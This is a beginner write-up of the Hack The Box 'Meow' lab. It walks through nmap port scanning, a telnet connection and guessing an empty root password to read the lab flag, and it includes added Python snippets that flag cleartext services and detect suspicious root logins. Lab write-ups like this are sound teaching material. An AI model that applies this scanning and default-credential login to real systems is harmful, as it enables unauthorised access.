Meow HTB Writeup
October 4, 2024, 11:20 am

1. Intro

So, recently I thought to myself: "I want to do more HTB challenges!" And yet, here I was, not having done the basic ones.

The aim of this writeup will be to cover the introductory Starting Point section inside of HTB.


To begin with, Meow helps introduce us to a few concepts. Sure, it aims to show us around the terminal, but it also teaches us a bit about virtual machines - also known as VMs.

It recommends the usage of Pwnbox, which is a pre-configured Kali VM. However, I will be using my own computer system and a Kali WSL, so I opted for OpenVPN.


2. OpenVPN

This is an easy setup.

  1. Download OpenVPN
  2. Download the VPN from HTB and set it up via double-click
  3. Profit


3. Ping

Now, in order to test if the connection to the host has been established (even though HTB is showing a blaring green connection), I entered my WSL terminal and did a simple...

┌──(morb㉿AllYourBase)-[~]
└─$ ping 10.129.1.17
PING 10.129.1.17 (10.129.1.17) 56(84) bytes of data.
64 bytes from 10.129.1.17: icmp_seq=1 ttl=62 time=591 ms
64 bytes from 10.129.1.17: icmp_seq=2 ttl=62 time=44.4 ms
64 bytes from 10.129.1.17: icmp_seq=3 ttl=62 time=46.1 ms
64 bytes from 10.129.1.17: icmp_seq=4 ttl=62 time=49.1 ms
64 bytes from 10.129.1.17: icmp_seq=5 ttl=62 time=43.6 ms
^C
--- 10.129.1.17 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4005ms
rtt min/avg/max/mdev = 43.638/154.923/591.406/218.249 ms


So, cool. The two things (my PC and the target) have a connection, due to being on the same Virtual Private Network (VPN).


4. The Workflow

Reading through the provided PDF, I came across a few important bits of information, which laid out the workflow I should follow when hacking.


4.1. Enumeration in Pentesting

When starting a penetration test or security evaluation on a target, one of the first steps is Enumeration. This phase involves gathering as much information as possible about the target’s current state.


Since I am now on the same Virtual Private Network (VPN) as the target, I can access it directly, similar to any other user. For instance:

  • If the target is a web server running a public web page, I can navigate to its IP address and explore the content.
  • If it’s a storage server, I can use the same IP address to connect and explore its files and folders, provided I have the necessary credentials.


But how do you find these services? Manually searching for them would be inefficient and time-consuming. Every server communicates using ports to transmit data to clients. The Enumeration phase begins with scanning these open ports to understand the target’s purpose on the network and identify potential vulnerabilities in the running services.


To scan ports quickly, we use a tool called nmap. More details about its usage will be covered later.


Once I have identified open ports, I can manually access each service using various tools to determine if their contents are accessible. Each service may require a different tool or script for access, and this knowledge comes with time, practice, and thorough research. In fact, 90% of penetration testing involves researching the product you're testing, since technology evolves continuously and it’s impossible to know everything. The crucial skill is the ability to efficiently search for the information you need to stay up-to-date.


The key in Enumeration is not speed, but thoroughness. Missing a resource during this phase could mean overlooking a critical attack vector, potentially doubling or tripling your work time on the target.


4.2. Establishing a Stable Connection and Scanning Ports

Once the target has replied successfully to four ping requests, we can confirm that the connection is both established and stable. To stop the ping process, press CTRL+C on your keyboard, which will display as ^C in the terminal (usually marked in green). This action will return control of the terminal, allowing you to proceed to the next step: scanning the target's open ports to identify running services.


To begin scanning, we use nmap (Network Mapper), which sends requests to the target's ports. If a port responds, nmap will report it as open. Since different services run on different ports, we use the -sV flag for service detection, which helps identify the name and version of the running service.


Here's a sample nmap command for this step:


nmap -sV {target_IP}


4.3. Useful Nmap Tags for Penetration Testing

nmap is a versatile tool with many options for scanning and analysing target systems. Below are some useful nmap tags for penetration testing:

  • -sS: TCP SYN Scan (Stealth Scan) – This scan type sends SYN packets to determine if ports are open without completing the TCP handshake, making it less likely to be logged by firewalls.
  • -sV: Service Version Detection – Used to identify the services running on open ports and their versions, which helps in finding potential vulnerabilities.
  • -O: Operating System Detection – Attempts to determine the target's operating system by analysing its responses to TCP/IP packets.
  • -A: Aggressive Scan – Enables OS detection, version detection, script scanning, and traceroute all in one command. This is useful for getting detailed information quickly but may be noisy.
  • -p: Port Specification – Allows you to specify particular ports to scan, which is helpful when targeting specific services or when a general scan takes too long (e.g., nmap -p 80,443 {target_IP} to scan only ports 80 and 443).
  • -sU: UDP Scan – Scans for open UDP ports, which can be trickier than TCP scans since UDP doesn't provide confirmation like TCP SYN does.
  • -Pn: No Ping – Skips host discovery (pinging), useful when ICMP requests are blocked, allowing you to go straight to scanning the ports.
  • --script: Nmap Scripting Engine (NSE) – Allows the use of specialized scripts for tasks such as vulnerability detection or brute-forcing credentials. For example, nmap --script vuln {target_IP} will run scripts designed to detect common vulnerabilities.
  • -T4: Timing Template – This speeds up scanning without sacrificing too much accuracy. Adjusting the timing can help when scanning slow networks or large ranges of IPs (T0 is the slowest, T5 the fastest).


Each of these flags can be combined to customize your scan based on your objective. For example:

nmap -sS -sV -O -p 1-1000 {target_IP}

This will run a stealth scan, detect services, identify the OS, and scan the first 1,000 ports of the target. Note that -sS and -O need raw-socket privileges, so on Linux the command has to run as root (hence the sudo in the scan below).


4.4. Hacking the thing

┌──(morb㉿AllYourBase)-[~]
└─$ sudo nmap -sV 10.129.1.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-04 13:11 CEST
Nmap scan report for 10.129.1.17
Host is up (0.25s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds


We can see port 23/tcp, with telnet.
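Reading the PORT/STATE/SERVICE/VERSION table by eye is fine for one host, but it is worth knowing what the scan is actually telling you: an open telnet service is a finding on its own, before any password is tried. The following is an added example (not part of the writeup or of nmap) that parses the normal-format output shown above and flags open cleartext services; the sample output is constructed to match the scan, and the list of risky services is my own assumption.

```python
import re

# Constructed sample: the table `nmap -sV` prints, matching the scan in the writeup.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-04 13:11 CEST
Nmap scan report for 10.129.1.17
Host is up (0.25s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# Services that carry credentials or sessions in cleartext (assumed list, extend as needed).
CLEARTEXT_SERVICES = {
    "telnet": "credentials and session traffic are unencrypted; replace with SSH",
    "ftp": "credentials sent in cleartext; prefer SFTP or FTPS",
    "http": "check whether anything sensitive is served without TLS",
}

# One row of the port table: "23/tcp open  telnet  Linux telnetd"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

def parse_nmap_ports(text):
    """Return one dict per PORT/STATE/SERVICE/VERSION row in nmap's normal output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            rows.append({k: v.strip() for k, v in m.groupdict().items()})
    return rows

def findings(text):
    """Map 'port/proto' -> note for every open port running a cleartext service."""
    out = {}
    for row in parse_nmap_ports(text):
        if row["state"] != "open":          # filtered/closed ports are not reachable services
            continue
        note = CLEARTEXT_SERVICES.get(row["service"])
        if note:
            version = row["version"] or "version unknown"
            out[f"{row['port']}/{row['proto']}"] = f"{row['service']} ({version}): {note}"
    return out

if __name__ == "__main__":
    for port, note in findings(SAMPLE_NMAP_OUTPUT).items():
        print(port, "-", note)
```

On the scan above this reports 23/tcp as telnet (Linux telnetd) with the replace-with-SSH note, which is the finding a report would lead with regardless of whether the login can be guessed.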

┌──(morb㉿AllYourBase)-[~]
└─$ telnet 10.129.1.17
Trying 10.129.1.17...
Connected to 10.129.1.17.
Escape character is '^]'.
  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█
Meow login:
Password:

Aaaand now we hit a wall. We need a username and password.


But luckily, because this is a beginner exercise, the login is obvious:

Meow login:
Password:
Login incorrect
Meow login: admin
Password:
Login incorrect
Meow login: administrator
Password:
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Fri 04 Oct 2024 11:16:48 AM UTC
  System load:           0.05
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             138
  Users logged in:       0
  IPv4 address for eth0: 10.129.1.17
  IPv6 address for eth0: dead:beef::250:56ff:fe94:6d14
 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.
   https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~#

We basically just guessed it.
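From the other side of the wire, that session is a handful of failed logins from one address followed by a root login on the same tty, which is exactly the pattern a host log should raise. The following is an added example (not from the writeup) that looks for it in auth.log-style lines; the sample lines are constructed, modelled on what util-linux login writes for a telnet session, and the exact wording on a given distribution is an assumption, so the two regexes may need adjusting.

```python
import re
from collections import defaultdict

# Constructed sample auth.log lines (assumed util-linux `login` wording): two guesses
# from one address, then a root login on the same pts, then an unrelated normal login.
SAMPLE_AUTH_LOG = """\
Oct  4 11:16:20 Meow login[1402]: FAILED LOGIN (1) on '/dev/pts/0' from '10.10.14.18' FOR 'admin', Authentication failure
Oct  4 11:16:31 Meow login[1402]: FAILED LOGIN (2) on '/dev/pts/0' from '10.10.14.18' FOR 'administrator', Authentication failure
Oct  4 11:16:48 Meow login[1402]: ROOT LOGIN  on '/dev/pts/0' from '10.10.14.18'
Oct  4 12:00:01 Meow login[1500]: LOGIN ON pts/1 BY ubuntu FROM 10.10.14.20
"""

FAILED = re.compile(
    r"login\[\d+\]: FAILED LOGIN \(\d+\) on '[^']+' from '(?P<src>[^']+)' FOR '(?P<user>[^']*)'"
)
ROOT_OK = re.compile(r"login\[\d+\]: ROOT LOGIN\s+on '[^']+' from '(?P<src>[^']+)'")

def root_logins_after_guessing(log_text):
    """Return [(source_ip, [usernames tried before root succeeded])] for every
    interactive root login. An empty list still means root logged in over the
    cleartext service, which is worth an alert on its own."""
    failures = defaultdict(list)   # source address -> usernames that failed so far
    alerts = []
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            failures[m.group("src")].append(m.group("user"))
            continue
        m = ROOT_OK.search(line)
        if m:
            src = m.group("src")
            alerts.append((src, failures.pop(src, [])))   # reset the counter once reported
    return alerts

if __name__ == "__main__":
    for src, tried in root_logins_after_guessing(SAMPLE_AUTH_LOG):
        print(f"root login from {src} after {len(tried)} failed guesses: {tried}")
```

The fix on the host side is the same whichever way you detect it: give root a password (or lock it), stop telnetd, and use SSH with root login disabled.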


Now we rummage around a lil, and find the flag. Ez.

root@Meow:~# ls
flag.txt  snap
root@Meow:~#
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~#
